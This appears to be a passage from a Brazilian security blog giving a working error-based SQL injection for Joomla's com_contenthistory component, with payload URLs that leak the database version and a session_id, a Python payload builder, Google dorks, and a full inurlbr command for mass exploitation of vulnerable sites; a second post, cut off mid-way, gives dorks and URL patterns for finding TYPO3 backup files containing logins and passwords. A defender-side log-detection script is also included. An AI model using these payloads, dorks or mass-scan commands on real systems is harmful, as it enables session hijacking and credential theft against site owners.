<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>RESPONSE - Example exploitation</b></span><b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: x-large;">:</b><br />
<b>URL:</b><br />
<span style="font-family: Courier New, Courier, monospace;">http://{TARGET}<b>/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>REQUEST SCREENSHOT:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirJS0MdBI-ET9jYdWTSo99rQDtF0_60D_tYmrkN85YCVMgZeP15xccIF_9BZyLvQyICul49nc_tt2BK2hx49yFHHTg5jBQvLnyT9Wt4u5WMbt1uzqaWd0ZuBRwa_tjWjQIW6uSXq27DJ2D/s1600/Captura+de+tela+de+2015-10-26+22%253A59%253A06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="PoC: REQUEST GET http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) RETURN REQUEST - Exemple Explotation: URL: http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a) PRINT REQUEST:" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirJS0MdBI-ET9jYdWTSo99rQDtF0_60D_tYmrkN85YCVMgZeP15xccIF_9BZyLvQyICul49nc_tt2BK2hx49yFHHTg5jBQvLnyT9Wt4u5WMbt1uzqaWd0ZuBRwa_tjWjQIW6uSXq27DJ2D/s640/Captura+de+tela+de+2015-10-26+22%253A59%253A06.png" title="PoC: REQUEST GET http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) RETURN REQUEST - Exemple Explotation: URL: http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a) PRINT REQUEST:" width="640" /></a></div>
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Base validation:</span></b><br />
The payload uses the double-query trick (<span style="font-family: Courier New, Courier, monospace;">COUNT(*)</span> with <span style="font-family: Courier New, Courier, monospace;">FLOOR(RAND(0)*2)</span> in a <span style="font-family: Courier New, Courier, monospace;">GROUP BY</span>), so MySQL fails with a "Duplicate entry '...' for key 'group_key'" error whose text carries the value of the expression placed in the middle of the <span style="font-family: Courier New, Courier, monospace;">CONCAT</span>. Wrapping that value in a known marker lets a scanner grep the leaked value out of the page and separate vulnerable targets from false positives.<br />
<b>MARKER</b> = <span style="font-family: Georgia, Times New Roman, serif;"> :INURLBR: </span> (with a leading and a trailing space)<br />
<b>HEX ENCODED</b> = <span style="font-family: Courier New, Courier, monospace;">0x203a494e55524c42523a20</span><br />
<br />
<b>INJECT:</b><span style="font-family: Courier New, Courier, monospace;"> <i>0x203a494e55524c42523a20</i>,version(),<i>0x203a494e55524c42523a20</i>....</span></div>
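An added example, not the post's code nor the inurlbr scanner's: a small Python helper that builds the error-based <span style="font-family: Courier New, Courier, monospace;">list[select]</span> payload with the <span style="font-family: Courier New, Courier, monospace;"> :INURLBR: </span> marker, produces the request URL for any expression (<span style="font-family: Courier New, Courier, monospace;">version()</span>, or the <span style="font-family: Courier New, Courier, monospace;">session_id</span> lookup from the PoC), and pulls the leaked value back out of the duplicate-entry error. The <span style="font-family: Courier New, Courier, monospace;">jml_</span> prefix, <span style="font-family: Courier New, Courier, monospace;">item_id=75</span> and <span style="font-family: Courier New, Courier, monospace;">type_id=1</span> are taken from the post's PoC and are not universal; the response body in the block is constructed, not captured from a real site.

```python
"""Added example (not the post's or inurlbr's code): build the error-based
payload for the com_contenthistory list[select] injection, and extract the
leaked value from the MySQL duplicate-entry error using the ' :INURLBR: '
marker. SAMPLE_RESPONSE is constructed; the 'jml_' prefix and the item/type
ids are the post's PoC values, not defaults you can rely on.
"""
import re
import urllib.parse

MARKER = " :INURLBR: "  # the post's marker, leading/trailing spaces included


def to_hex_literal(text: str) -> str:
    """Encode a string as a MySQL hex literal so the payload needs no quotes."""
    return "0x" + text.encode("utf-8").hex()


def error_based_payload(expression: str) -> str:
    """Wrap a SQL expression in the COUNT(*)/FLOOR(RAND(0)*2)/GROUP BY
    duplicate-key trick so its value is echoed inside the DB error message."""
    marker = to_hex_literal(MARKER)
    return (
        "1 AND (SELECT 5030 FROM(SELECT COUNT(*),"
        f"CONCAT({marker},{expression},{marker},FLOOR(RAND(0)*2))x "
        "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
    )


def session_expression(prefix: str = "jml_") -> str:
    """Expression leaking one session_id from the Joomla session table
    (prefix is per-installation and must be discovered first)."""
    return f"(SELECT session_id FROM {prefix}session LIMIT 0,1)"


def build_url(target: str, expression: str, item_id: int = 75, type_id: int = 1) -> str:
    """Assemble the GET request; urlencode takes care of the brackets and spaces."""
    params = {
        "option": "com_contenthistory",
        "view": "history",
        "list[ordering]": "",
        "item_id": str(item_id),
        "type_id": str(type_id),
        "list[select]": error_based_payload(expression),
    }
    return target.rstrip("/") + "/index.php?" + urllib.parse.urlencode(params)


def extract_leak(body: str):
    """Return the text between the two markers, or None when the page did not
    echo the database error (patched site, other DBMS, errors hidden, blocked)."""
    m = re.search(re.escape(MARKER) + r"(.*?)" + re.escape(MARKER), body, re.S)
    return m.group(1) if m else None


# Constructed response body in the shape of the MySQL error Joomla echoes.
SAMPLE_RESPONSE = (
    "<html><body>Error: 1062 Duplicate entry ' :INURLBR: 5.5.46-0+deb8u1 :INURLBR: 1' "
    "for key 'group_key' SQL=SELECT 1 AND (SELECT 5030 FROM(...)a)</body></html>"
)

if __name__ == "__main__":
    print(build_url("http://{TARGET}", "version()"))
    print(build_url("http://{TARGET}", session_expression()))
    print("leaked:", extract_leak(SAMPLE_RESPONSE))
```

The marker is what makes mass validation cheap: a scanner only has to search the response for the hex-decoded marker string (the value inurlbr receives through <span style="font-family: Courier New, Courier, monospace;">-a</span>) and everything between the two copies is the leaked value, regardless of how the rest of the error page is formatted.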
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">DORK:</span></b><br />
<ol>
<li><span style="font-family: Georgia, Times New Roman, serif;">components/com_contenthistory/</span></li>
<li><span style="font-family: Georgia, Times New Roman, serif;">inurl:com_contenthistory</span></li>
<li><span style="font-family: Georgia, Times New Roman, serif;">index.php?option=com_contenthistory</span></li>
<li><span style="font-family: Georgia, Times New Roman, serif;">"index of" components/com_contenthistory/</span></li>
<li><span style="font-family: Georgia, Times New Roman, serif;">inurl:"components/com_contenthistory/"</span></li>
<li><span style="font-family: Georgia, Times New Roman, serif;">inurl:"index.php?option=com_contenthistory"</span></li>
</ol>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Search demonstration:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEGfwxLTuZPN83tjNRgJ3PbuvhYfBMnx2QOsPo1TFzoQd13q-tZhA6fgTOUVCVMiT7Fju7YNukjbFhO53IGbP9ZpU5x9X55cBBy7Mee1nTTJWlMCfl12l2qoxoja4CTNAaxysuXnntH7vH/s1600/joomla.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="DORK: components/com_contenthistory/ "index of" components/com_contenthistory/ inurl:"components/com_contenthistory/"" border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEGfwxLTuZPN83tjNRgJ3PbuvhYfBMnx2QOsPo1TFzoQd13q-tZhA6fgTOUVCVMiT7Fju7YNukjbFhO53IGbP9ZpU5x9X55cBBy7Mee1nTTJWlMCfl12l2qoxoja4CTNAaxysuXnntH7vH/s640/joomla.png" title="DORK: components/com_contenthistory/ "index of" components/com_contenthistory/ inurl:"components/com_contenthistory/"" width="475" /></a></div>
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Using inurlbr scanner for mass exploitation:</span></b><br />
Download script: <a href="https://github.com/googleinurl/SCANNER-INURLBR" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR</a><br />
<b>- Creating our command</b><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET DORK:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> <b>--dork '</b>YOU_DORK<b>'</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> OR</span><br />
<span style="font-family: Courier New, Courier, monospace;"> <b>--dork-file '</b>YOU_FILE_DORK.txt<b>'</b></span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET SEARCH ENGINES:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>-q all</b></span><br />
<i> we will use all the search engines available in the script</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET OUTPUT FILE:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> <b>-s</b> com_contenthistory.txt</span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET TYPE VALIDATION:</span></b><br />
<span style="font-family: Courier New, Courier, monospace;"> <b>-t 2</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> 2 </span><span style="font-family: Times, Times New Roman, serif;"><i>The second type tries to validate the value defined by: -a 'VALUE_INSIDE_THE_TARGET'</i></span><br />
<span style="font-family: Times, Times New Roman, serif;"><i> It also sends the exploit to the target through the GET method.</i></span><br />
<br />
<i>Before setting the exploit we have to manipulate its string; for that we use an internal function of the inurlbr scanner, so that a validation string is passed inside the SQL injection and vulnerable targets can be told apart from the rest.</i><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">Internal function - Converting strings in hexadecimal</span></b><br />
<span style="font-family: Courier New, Courier, monospace;"> hex Encrypt values in hex.</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Example: hex({value})</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: hex(102030)</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: --exploit-get 'user?id=hex(102030)'</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Result inject:</span><br />
<span style="font-family: Courier New, Courier, monospace;"> http://www.target.localhost.br/user?id=313032303330</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><b>--exploit-get</b> <b>'</b>/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))<b>'</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">hex(INURLBR)</span></b> = 494e55524c4252<br />
<br />
<b><span style="font-family: Courier New, Courier, monospace;">Example injection:</span></b><br />
<span style="font-family: 'Courier New', Courier, monospace;">http://www.target.localhost.br</span><span style="font-family: 'Courier New', Courier, monospace;">/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET STRING VALIDATION:</b></span><br />
<i><span style="font-family: Times, Times New Roman, serif;">Specify the string that will be used on the search script:</span></i><br />
<span style="font-family: Courier New, Courier, monospace;"> Example: -a {string}</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: -a '<title>hello world</title>'</span><br />
<span style="font-family: Courier New, Courier, monospace;"> </span><i><span style="font-family: Courier New, Courier, monospace;"> </span><span style="font-family: Times, Times New Roman, serif;">If the specified value is found in the target, it is considered vulnerable.</span></i><br />
<span style="font-family: Courier New, Courier, monospace;"> Setting: <b>-a '</b>INURLBR<b>'</b></span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>SET FILTER RESULTS:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><b> --unique</b></span><br />
<i><span style="font-family: Times, Times New Roman, serif;"> Filter results to unique domains.</span></i><br />
<i><span style="font-family: Times, Times New Roman, serif;"> Removes all GET parameters from the URL.</span></i><br />
<div>
<br /></div>
<div>
<span style="font-family: Times, Times New Roman, serif;"><i>We validate the string <b>"INURLBR"</b> as it was passed inside the SQLi exploit: if that value appears in the target's response, the injection succeeded.</i></span></div>
<div>
<br /></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>COMMAND FULL: </b></span><br />
<span style="font-family: Courier New, Courier, monospace;">php inurlbr.php <b>--dork '</b>inurl:"/components/com_contenthistory"<b>'</b> <b>-s</b> com_contenthistory.txt <b>--exploit-get '</b>/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0x<b><i>hex(INURLBR)</i></b>,versio(),0x<b><i>hex(INURLBR)</i></b>,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))<b>'</b> <b>-t</b> 3 <b>-a '</b>INURLBR<b>' --unique</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace;"><b>Execution return:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHOuCgeciGHpijfV4tlrTQUtSi7GPc3vsLjYkbUdiql3o_Rz5eipHgJC9Dj5DKh64Sk9vAa7_-9WfpXp9VbHgWg7FWCwQhV500thvpvt_xTv1n7mXLmvdLt0cR2UchIQVc7z-fgu6nNaj3/s1600/Captura+de+tela+de+2015-10-27+03%253A40%253A53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt=" SET STRING VALIDATION: Specify the string that will be used on the search script: Example: -a {string} Usage: -a '<title>hello world</title>' If specific value is found in the target he is considered vulnerable. Setting: -a 'INURLBR' SET FILTER RESULTS: --unique Filter results in unique domains. removes all gets the URL Let's validate the string "INURLBR" as she passed within the SQLI exploit, if such value appear on our target was successfully injected. COMMAND FULL: php inurlbr.php --dork 'inurl:"/components/com_contenthistory"' -s com_contenthistory.txt --exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))' -t 3 -a 'INURLBR' --unique Execution return:" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHOuCgeciGHpijfV4tlrTQUtSi7GPc3vsLjYkbUdiql3o_Rz5eipHgJC9Dj5DKh64Sk9vAa7_-9WfpXp9VbHgWg7FWCwQhV500thvpvt_xTv1n7mXLmvdLt0cR2UchIQVc7z-fgu6nNaj3/s640/Captura+de+tela+de+2015-10-27+03%253A40%253A53.png" title=" SET STRING VALIDATION: Specify the string that will be used on the search script: Example: -a {string} Usage: -a '<title>hello world</title>' If specific value is found in the target he is considered vulnerable. Setting: -a 'INURLBR' SET FILTER RESULTS: --unique Filter results in unique domains. removes all gets the URL Let's validate the string "INURLBR" as she passed within the SQLI exploit, if such value appear on our target was successfully injected. 
COMMAND FULL: php inurlbr.php --dork 'inurl:"/components/com_contenthistory"' -s com_contenthistory.txt --exploit-get '/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1 AND (SELECT 5030 FROM(SELECT COUNT(*),CONCAT(0xhex(INURLBR),versio(),0xhex(INURLBR),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))' -t 3 -a 'INURLBR' --unique Execution return:" width="640" /></a></div>
<br />
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span>
<span style="font-family: Courier New, Courier, monospace;"><b>SOLUTION:</b></span> <a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0" target="_blank">Trustwave SpiderLabs</a> <i>recommends that ALL Joomla users update their Joomla installations to version 3.4.5.</i><br />
<b>UPDATE:</b><br />
<a href="https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html" style="font-style: italic;" target="_blank">https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html</a><br />
<br />
<b>Source INFO-1</b>-> <a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0" target="_blank">https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0</a><br />
<br />
<b>Source INFO-2</b>-> <a href="https://cxsecurity.com/issue/WLB-2015100146" target="_blank">https://cxsecurity.com/issue/WLB-2015100146</a><br />
<br /></div>
<div>
<b>Source INFO-3</b>-> <a href="http://pplware.sapo.pt/informacao/alerta-milhoes-de-sites-baseados-no-joomla-estao-vulneraveis/" target="_blank">http://pplware.sapo.pt/informacao/alerta-milhoes-de-sites-baseados-no-joomla-estao-vulneraveis/</a></div>
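A defender-side complement to the injection pattern and the hex marker shown above, added here as an example (it is not code from the blog, from inurlbr or from Joomla): it parses constructed access-log lines, flags requests that carry SQL in the com_contenthistory list[select] parameter, and decodes any 0x hex literals so a responder can recognise the scanner's validation string in the request.

```python
"""Detect the com_contenthistory SQL injection pattern in web access logs.

Added example for this post; the log lines below are constructed samples in
the common Apache/nginx combined format.
"""
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Only the request line ("GET /path HTTP/1.1") is needed from each log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Building blocks of the error-based technique shown in the post: a subquery
# with CONCAT(...), FLOOR(RAND(0)*2) and a GROUP BY over INFORMATION_SCHEMA.
SQLI_MARKERS = (
    re.compile(r"\bSELECT\b.*\bFROM\b", re.I),
    re.compile(r"\bCONCAT\s*\(", re.I),
    re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I),
    re.compile(r"INFORMATION_SCHEMA", re.I),
    re.compile(r"\bGROUP\s+BY\b", re.I),
)
HEX_LITERAL_RE = re.compile(r"0x([0-9a-fA-F]{2,})")


def decode_hex_markers(sql: str) -> List[str]:
    """Decode 0x... literals to text; 0x203a494e55524c42523a20 is ' :INURLBR: '."""
    decoded = []
    for hexdigits in HEX_LITERAL_RE.findall(sql):
        if len(hexdigits) % 2:
            continue
        try:
            decoded.append(bytes.fromhex(hexdigits).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            pass  # not printable text, e.g. a numeric 0x literal
    return decoded


def analyze_request(target: str) -> Optional[dict]:
    """Return a finding when list[select] of com_contenthistory carries SQL, else None."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get("option", [""])[0] != "com_contenthistory":
        return None
    for raw in params.get("list[select]", []):
        value = unquote_plus(raw)  # tolerate a double-encoded value
        hits = [m.pattern for m in SQLI_MARKERS if m.search(value)]
        if len(hits) >= 2:  # two independent markers keeps false positives low
            return {
                "param": "list[select]",
                "markers": len(hits),
                "decoded_hex": decode_hex_markers(value),
            }
    return None


def scan_log(lines) -> List[dict]:
    """Run analyze_request over every request line; return findings with line numbers."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        finding = analyze_request(match.group("target"))
        if finding:
            finding["line"] = number
            finding["method"] = match.group("method")
            findings.append(finding)
    return findings


# Constructed sample log: a legitimate history view, a probe carrying the
# payload shape from the post, and an unrelated component request.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Oct/2015:03:40:53 -0200] "GET /index.php?option=com_contenthistory&view=history&item_id=75&type_id=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Oct/2015:03:41:10 -0200] "GET /index.php?option=com_contenthistory&view=history&list%5Bordering%5D=&item_id=75&type_id=1&list%5Bselect%5D=1%20AND%20(SELECT%205030%20FROM(SELECT%20COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)) HTTP/1.1" 500 512 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [27/Oct/2015:03:42:00 -0200] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```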
InurlBR http://www.blogger.com/profile/12688503833321390298 noreply@blogger.com 6 tag:blogger.com,1999:blog-5670232360751087799.post-6946181171667655842 2015-10-14T02:56:00.002-03:00 2015-11-19T21:36:22.032-02:00 ( 0day ) CMS Typo3 / Full Info Disclosure Flaw<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbRj0d3Vf_BfNXDH7QYNmPlOAmGxhB_Go2LnY59ogV5JjIM5NiIP1dR54SE6ypjtn6VIPBTlexFNPimxtveR9F557Kukqn9HSqESMYS2SIlHN0Uk47KFhbXGzdBsqncaCYn1E27GT1RqN9/s1600/typo3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Continuando minhas pesquisas atrás de vulnerabilidade em CMS's, nos últimos dias estava procurando por padrões em arquivos .XML,T3D, que me pudessem trazer informações sensíveis do servidor. No procedimento de criar dork, refazer, criar um novo padrão acabei descobrindo uma falha no CMS TYPO3 que possibilita acessar arquivos XML,T3D do servidor que contenham LOGIN & SENHA da plataforma." border="0" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbRj0d3Vf_BfNXDH7QYNmPlOAmGxhB_Go2LnY59ogV5JjIM5NiIP1dR54SE6ypjtn6VIPBTlexFNPimxtveR9F557Kukqn9HSqESMYS2SIlHN0Uk47KFhbXGzdBsqncaCYn1E27GT1RqN9/s640/typo3.png" title="Continuando minhas pesquisas atrás de vulnerabilidade em CMS's, nos últimos dias estava procurando por padrões em arquivos .XML,T3D, que me pudessem trazer informações sensíveis do servidor. No procedimento de criar dork, refazer, criar um novo padrão acabei descobrindo uma falha no CMS TYPO3 que possibilita acessar arquivos XML,T3D do servidor que contenham LOGIN & SENHA da plataforma." width="640" /></a></div>
<br />
Continuing my research on vulnerabilities in <b>CMSs</b>, over the last few days I was looking for patterns in .<b>XML, T3D</b> files that could bring me sensitive information from the server.<br />
In the process of creating a dork, redoing it and creating a new pattern, I ended up discovering a flaw in the<br />
<b>TYPO3</b> CMS that makes it possible to access <b>XML, T3D </b>files on the server that contain the platform's <b>LOGIN</b> & <b>PASSWORD</b>.<br />
<div style="text-align: center;">
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span></div>
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<div style="text-align: left;">
<span style="font-family: "courier new" , "courier" , monospace;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2QHGgWkPywtd3xAEfG8t-VfxGaRlqLdc7mwG7EQ-gqMFwApAOe-FelmHqETGMrClv-9caHzcpS5aLVCYpbPftHVfcyblK1bDnSez9I3Y2el-4NFHIiwXsDwPQ8puvUlYTjB4GTvdoRzpB/s1600/giphy.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt=""Não é um CMS muito usado, o artigo é somente para estudos mesmo, um desenvolvedor pode ver esse exemplo e saber o que não fazer com seus backups e ter mais cuidado com arquivos gerados pelo sistema."" border="0" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2QHGgWkPywtd3xAEfG8t-VfxGaRlqLdc7mwG7EQ-gqMFwApAOe-FelmHqETGMrClv-9caHzcpS5aLVCYpbPftHVfcyblK1bDnSez9I3Y2el-4NFHIiwXsDwPQ8puvUlYTjB4GTvdoRzpB/s400/giphy.gif" title=""Não é um CMS muito usado, o artigo é somente para estudos mesmo, um desenvolvedor pode ver esse exemplo e saber o que não fazer com seus backups e ter mais cuidado com arquivos gerados pelo sistema."" width="400" /></a><b></b></span><br />
<div style="text-align: center;">
<span style="font-family: "courier new" , "courier" , monospace;"><b><b><span style="font-size: large;">"It is not a widely used CMS; the article is only for study purposes. A developer can look at this example and learn what not to do with their backups, and be more careful with files generated by the system."</span></b></b></span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Looking closely at the files, they follow a <b>backup</b> pattern of the system itself, kept in unprotected folders. Google indexes their content, so it is entirely possible to reach them with advanced search operators - (<b>DORKS</b> / <b>STRINGS</b>).<br />
The password files are stored in the <b>"/fileadmin/" </b>folder, some<b> </b>with a fixed string in the name,<b> "utopia"</b>, and their extension is<b> ".t3d.xml" </b>or<b> .t3d</b><br />
<b><br /></b>
<br />
<pre><b><span style="font-size: large;">INFORMATION:</span></b>
# ----------------------------------------------------------
#[+] Type: Full Info Disclosure
#[+] Vendor: https://typo3.org/typo3-cms/
#[+] VULNERABLE VERSIONS: 4.2, 4.5
# ----------------------------------------------------------
#[+] AUTHOR: googleINURL
#[+] EMAIL: inurlbr@gmail.com
#[+] Blog: http://blog.inurl.com.br
#[+] Twitter: https://twitter.com/googleinurl
#[+] Fanpage: https://fb.com/InurlBrasil
#[+] Pastebin http://pastebin.com/u/Googleinurl
#[+] GIT: https://github.com/googleinurl
#[+] PSS: http://packetstormsecurity.com/user/googleinurl
#[+] YOUTUBE: http://youtube.com/c/INURLBrasil
#[+] PLUS: http://google.com/+INURLBrasil
#[+] IRC: irc.pŕiv8.jp / #inurlbrasil
</pre>
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> SEARCH DORKS:</span></b><br />
<ol>
<li><b><span style="font-family: "courier new" , "courier" , monospace;">/fileadmin/utopia ext:xml</span></b></li>
<li><b><span style="font-family: "courier new" , "courier" , monospace;">/fileadmin/utopia*.t3d.xml</span></b></li>
<li><b><span style="font-family: "courier new" , "courier" , monospace;">site:fr /fileadmin/utopia ext:xml</span></b></li>
<li><b><span style="font-family: "courier new" , "courier" , monospace;">"utopia" inurl:t3d ext:xml</span></b></li>
<li><b><span style="font-family: "courier new" , "courier" , monospace;">/fileadmin/ typo3 ext:t3d</span></b></li>
</ol>
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">POC .XML FILE:</span></b><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">http://{server}/fileadmin/utopia{random}.t3d.xml</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">http://{server}/subdir/fileadmin/utopia{random}.t3d.xml</span><br />
<b>Ex:</b><br />
<span style="font-family: "courier new" , "courier" , monospace;">http://vull.fr/fileadmin/utopia4cb2c07e326f4.t3d.xml</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">http://vull.fr/subdir/subdir2_/fileadmin/utopia506c4cd063fa0.t3d.xml</span><br />
<br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Example file content:</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
